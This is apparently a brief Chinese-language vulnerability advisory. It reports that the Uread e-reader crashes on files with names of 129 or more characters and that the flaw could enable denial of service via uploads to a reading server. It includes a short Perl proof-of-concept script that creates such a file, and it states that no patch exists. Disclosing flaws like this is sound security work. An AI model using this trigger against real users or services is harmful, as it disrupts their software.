客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。 远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。 测试证明 ----------------------------------------------------------- #!/usr/bin/perl -w $filename="a"x129; print "------Generate testfile \"a\"x129.epub------\n"; open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "------Complete!------\n"; exit(1); ----------------------------------------------------------- 修复方案: 目前厂商还没有提供补丁或者升级程序。 作者 demonalex |
请发表评论